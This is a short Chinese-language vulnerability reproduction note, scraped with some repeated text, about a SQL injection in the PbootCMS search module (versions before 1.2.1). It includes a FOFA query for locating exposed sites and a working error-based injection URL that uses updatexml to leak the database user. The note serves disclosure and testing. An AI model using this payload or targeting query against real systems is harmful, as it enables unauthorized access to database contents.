PbootCMS search SQL注入漏洞
漏洞描述
PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息
漏洞影响
Note
PbootCMS < 1.2.1
FOFA
Note
app="PBOOTCMS"
漏洞复现
搜索框页面为
Payload为
Last updated
Was this helpful?
PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息
Note
PbootCMS < 1.2.1
Note
app="PBOOTCMS"
搜索框页面为
Payload为
Last updated
Was this helpful?
Was this helpful?
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)